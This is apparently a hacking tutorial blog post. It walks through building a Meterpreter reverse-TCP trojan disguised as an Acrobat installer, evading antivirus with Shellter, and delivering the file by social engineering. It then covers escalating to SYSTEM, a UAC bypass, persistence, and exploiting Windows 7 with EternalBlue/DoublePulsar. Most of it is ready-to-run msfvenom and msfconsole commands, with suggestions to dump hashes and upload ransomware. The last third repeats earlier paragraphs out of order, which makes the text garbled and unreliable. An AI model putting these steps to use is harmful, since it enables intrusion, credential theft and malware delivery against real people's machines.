Hacking into Windows 10 Using Metasploit Framework
Hackers always seeking zero-day exploits that can successfully bypass Windows 10’s security features. There has been extensive research into creating undetectable malware and entire GitHub projects dedicated to automating the creation of undetectable payloads such as WinPaylods, Veil v3, and TheFatRat.
A trojan or a backdoor can give access to target box remotely. Here we going to use reverse_tcp module. This is a specially crafted malware that establish a remote connection to the hacker’s machine over Transition Control Protocol from the victim machine. This allows the hacker to breach into the machine and take full control over it.
Metasploit framework is one of the best tool that I love in Kali Linux. It has both handler and payload generator. Once the payload gets executed on the target machine while then we are on listening mode in the handler section it spawns a meterpreter shell. This meterpreter shell allow us to communicate with the target system and execute shell commands. Compared to normal shell meterpreter has plenty of options. This can be done while the target is on the same LAN network or over the internet, there is no difference you just have to configure the router and payload accordingly. This process is dead simple. Follow the steps.
The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conductive environment (referred to as a Meterpreter) to manipulate compromised machines. We shall do this through a malicious executable file using Shellter.
THIS ARTICLE ASSUMES THE INSTALLATION OF KALI LINUX HAS BEEN DONE AND IS REACHABLE THROUGH A BRIDGED CONNECTION FROM A WINDOWS MACHINE ON VMWARE.
Generating a Malicious .exe file
Generate the payload using msfvenom, set the port to 4444 and IP to your public IP or local IP depending on your target. The generated Trojan will try to connect to this IP and port when its executed. following command will generate the Trojan in .exe format.
To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet) as shown below.
ifconfig
A Trojan will be generated in the desktop. keep it aside and move on to handler section. you would use msfvenom as shown in the command below:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.11.118 LPORT=4444 -o /root/acrobatreaderpro.exe
The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
Antivirus solutions work by detecting malicious signatures within executable. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
Making the Executable FUD (Fully Undetectable)
To encode our executable, we shall be using Shellter. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.
Use the below code to install and run Shellter.
sudo apt-get install shellter
To launch Shellter just type Shellter on the terminal.
You will be required to enter the absolute path to the executable to make FUD. Make sure to select “Auto” mode as shown below.
Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.
The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
At this point, the executable you provided will have been made undetectable to antivirus programs.
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
The screenshot below shows what commands to issue within Metasploit.
First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler.
We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST 192.168.11.118 and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.
The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.
The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, I uploaded to drive and copy the acrobatreaderpro.exe to a Windows system within the same network as the Kali system.
Executing the Payload
Execute the payload from the target machine. The executable causes the payload to be executed and connect back to the attacking machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux:
Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user to a more privileged one, preferably the SYSTEM user, which has all administrative rights.
On the Meterpreter prompt we use the getsystem command, as shown below:
With these privileges, we can do quite a lot on our compromised target. For instance, we can list the active processes, access to system folders and dump the passwords or hashes. Make directory and upload malware or ransomware program or other payload.
Now that we are within the target machine, why not perform some persistence to remain within?
Persistence
Persistence allows us to gain access back to the machine whenever we need to even when the target decides to patch the vulnerability.
There are many ways of performing persistence. For example, we can code a malicious virus to always connect back to us whenever the target turns on their machine (this is called a backdoor), or even have our own user accounts within the compromised target machine. Metasploit also provides its method of persistence.
If the methods used by getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we “background” our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.
We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
In our case we already gained an access to the target box, we got the failed message. In your case you receive a Meterpreter session response. Typing sysinfo may show the information of your target. getuid shows that you are running as user on Windows 10, but you can elevate to SYSTEM by issuing getsystem. You can see that elevation was successful and you can confirm this by issuing getuid again, you can see NT AUTHORITY\SYSTEM.
You can list the process of the target box, browse through the system folders, make directory and upload Trojan.
Conclusion
Hackers are not limited in what they can use the framework for. For instance, it can also be used to perform information gathering and pivoting through compromised networks. Since our whole objective here was to create an undetectable payload, antivirus software is not really a good option for protecting against these types of file extension spoofing attacks.
One thing you can do is just put on your magnifying glass when looking at files you download off the internet. In this article we have seen how the Metasploit Framework can be used to compromise a Windows 10 machine to gain a Meterpreter session. We have used Shellter to FUD our malicious executable to bypass the Windows 10 antivirus and performed privilege escalation to gain more rights on our compromised machine.
Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption
This module is a port of the Equation Group ETERNAL BLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.
Let’s start!!!
Attacker: Kali Linux
Target: Windows 7
Open the terminal in your Kali Linux type msfconsole to load Metasploit framework.
WINDOWS 7 REMOTE EXPLOITATION WITH ETERNALBLUE & DOUBLEPULSAR EXPLOIT THROUGH METASPLOIT
EternalBlue is an exploit used by the WannaCry ransomware and is among the National Security Agency (NSA) exploits disclosed by the Shadow Brokers hackers group. The remote code execution vulnerability in Windows SMB is the vulnerability exploited by SMB. Microsoft has released a patch MS17-010 to address the vulnerability exploited by the EternalBlue exploit. Sending crafted SMB packets over multiple TCP connections is what is employed by EternalBlue to exploit a target machine. EternalBlue exploit is used alongside DoublePulsar, a backdoor implant. Used together, the DoublePulsar, creates a backdoor, which is then used by the attackers to plant a secondary malware into the victim’s system. DoublePulsar enables persistence on the victim’s machine.
This articles describes the use of EternalBlue and DoublePulsar to hack into a Windows 7 machine. To achieve that we are going to make use of Metasploit in Kali Linux machine. To determine the IP address of our both machines residing in a Virtual Machine, we are going to issue the following commands on the windows target:
ipconfig
And run the following command on the Kali Machine
ifconfig
The IP addresses of both machines have been determined to be 192.168.43.104 and 192.168.43.45 respectively. Also for the attack to be successful, we have to make sure port 445 is open on the target host. So we can run a port scan on the target host to determine that. To ensure that our Kali Machine is up to date we can run the following commands:
apt-get update -y && apt-get upgrade -y
We now download and add the exploit and the scanner to the Metasploit. We first issue the following commands on our attacking machine, respectively:
We now move file smb_ms17_010.rb under the folder usr/share/metasploit-framework/modules/auxiliary/scanner/smb
We then copy EternalBlue-Doublepulsar.rb and debs to usr/share/metasploit-framework/modules/exploits/windows/smb. Next we open the EternalBlue-Doublepulsar.rb with any editor and change the path directory for ETERNALBLUE and DOUBLEPULSARto smb exploit directory usr/share/metasploit-framework/modules/exploits/windows/smb. We then specify the name of the process to be injected, we have specified here as explorer.exe. Then we would launch msfconsole and use the auxiliary scan module. smb_ms17_010.rb.
use auxiliary/scanner/smb/smb_ms17_010
Then we run the following commands to determine our various options:
show options
We now setup RHOSTS IPwhich is the Victims IP address.
set RHOSTS 192.168.43.104
After doing that, we run the exploit with the run command:
run
Upon running the exploit, it will go and check whether the host is vulnerable or not and also display the victim machine details.
Next we move to the exploit EternalBlue and DoublePulsar with the following commands:
use exploit/windows/smb/eternalblue_doublepulsar
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.43.104
set LHOST 192.168.43.45
set targetarchitecture x86
After setting all the above options with the above commands, we now run the exploit, by issuing this command:
exploit
And lo and behold we have a meterpreter shell in Windows 7.
To confirm that our attack is successful we issue the command:
sysinfo
This will return information about the target machine.
A Trojan will be generated in the desktop. keep it aside and move on to handler section. you would use msfvenom as shown in the command below:
Antivirus solutions work by detecting malicious signatures within executable. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.
The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
At this point, the executable you provided will have been made undetectable to antivirus programs.
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
The screenshot below shows what commands to issue within Metasploit.
First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler.
We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST 192.168.11.118 and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.
The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.
The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, I uploaded to drive and copy the acrobatreaderpro.exe to a Windows system within the same network as the Kali system.
Executing the Payload
With these privileges, we can do quite a lot on our compromised target. For instance, we can list the active processes, access to system folders and dump the passwords or hashes. Make directory and upload malware or ransomware program or other payload.
Now that we are within the target machine, why not perform some persistence to remain within?
We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
In our case we already gained an access to the target box, we got the failed message. In your case you receive a Meterpreter session response. Typing sysinfo may show the information of your target. getuid shows that you are running as user on Windows 10, but you can elevate to SYSTEM by issuing getsystem. You can see that elevation was successful and you can confirm this by issuing getuid again, you can see NT AUTHORITY\SYSTEM.
You can list the process of the target box, browse through the system folders, make directory and upload Trojan.
